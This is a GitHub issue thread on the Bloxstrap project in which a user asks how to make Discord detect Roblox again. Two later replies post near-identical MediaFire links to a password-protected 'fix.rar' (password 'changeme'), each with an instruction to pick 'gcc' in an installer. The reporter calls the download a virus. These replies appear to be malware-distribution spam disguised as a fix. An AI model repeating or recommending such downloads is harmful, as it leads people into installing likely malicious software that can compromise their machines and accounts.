### ISSUE TITLE
[BUG] discord not detect roblox

### ISSUE THREAD

**Issue by Jonmaster2007** [pizzaboxer/bloxstrap#2755]
### Acknowledgement of preliminary instructions

- [X] I have read the preliminary instructions, and I am certain that my problem has not already been addressed.
- [X] I have thoroughly looked through the available Wiki articles and could not find a solution to my problem.
- [X] I am using the latest version of Bloxstrap.
- [ ] I did not answer truthfully to all the above checkboxes.

### What problem did you encounter?

basically i was exploring discord overlay and i accidently hit that one button that stops roblox detection and now i cant undo it so it wont detect roblox anymore and i feel like discord is just shit at this point for not having an undo feature so i need help fixing this please

**Comment by Saschl** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Jonmaster2007** [comment]
> Download https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file password: changeme In the installer menu, select "gcc."

whats that virus gonna do

**Comment by NeonRST** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
